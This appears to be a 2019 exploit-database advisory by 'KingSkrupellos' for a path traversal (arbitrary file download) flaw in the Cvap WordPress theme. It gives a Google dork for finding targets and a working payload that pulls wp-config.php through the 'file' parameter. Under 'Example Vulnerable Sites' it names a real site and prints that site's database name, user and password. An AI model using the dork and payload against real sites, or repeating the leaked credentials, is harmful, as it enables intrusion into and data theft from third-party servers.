WordPress 4.3.1 Cvap Themes Canada Arbitrary File Download

1. ############################################################################################
2.  
3. # Exploit Title : WordPress 4.3.1 Cvap Themes Canada Arbitrary File Download
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 18/03/2019
7. # Vendor Homepage : cvap.quebec - unikmedia.ca
8. # Software Information Link :
9. unikmedia.ca/services-creation-site-web-quebec/creation-site-web/
10. # Software Affected Version : 4.3.1
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:"/wp-content/themes/cvap/"
15. intext:© CVAP 2015 - Création site web Québec Unik Media
16. # Vulnerability Type :
17. CWE-200 [ Information Exposure ]
18. CWE-23 [ Relative Path Traversal ]
19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
22.  
23. ############################################################################################
24.  
25. # Impact :
26. ***********
27. * WordPress 4.3.1 Cvap Canada Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
28.  
29. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
30.  
31. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
32.  
33. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
34.  
35. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
36.  
37. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
38.  
39. ############################################################################################
40.  
41. # Vulnerable File :
42. ****************
43. /downloadfile.php
44.  
45. # Vulnerable Parameter :
46. ***********************
47. ?file=
48.  
49. # Arbitrary File Download Exploit :
50. *******************************
51. /wp-content/themes/cvap/downloadfile.php?file=[FILENAME]
52.  
53. /wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php
54.  
55. # Information about MySQL Configuration File :
56. ******************************************
57. ** //
58. /** Nom de la base de données de WordPress.
59. */
60. define('DB_NAME', '');
61.  
62. /
63. ** Utilisateur de la base de données MySQL.
64. */
65. define('DB_USER', '');
66.  
67. /
68. ** Mot de passe de la base de données MySQL.
69. */
70. define('DB_PASSWORD', '');
71.  
72. /
73. ** Adresse de l'hébergement MySQL.
74. */
75. define('DB_HOST', '');
76.  
77. /
78.  
79. ############################################################################################
80.  
81. # Example Vulnerable Sites :
82. *************************
83. [+] cvap.quebec/wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php
84.  
85. ** //
86. /** Nom de la base de données de WordPress.
87. */
88. define('DB_NAME', 'cvap_wpdatabase');
89.  
90. /
91. ** Utilisateur de la base de données MySQL.
92. */
93. define('DB_USER', 'cvap_wpbduser');
94.  
95. /
96. ** Mot de passe de la base de données MySQL.
97. */
98. define('DB_PASSWORD', 'FZc3anVHs6sWfRo');
99.  
100. /
101. ** Adresse de l'hébergement MySQL.
102. */
103. define('DB_HOST', 'localhost');
104.  
105. /
106.  
107. ############################################################################################
108.  
109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
110.  
111. ############################################################################################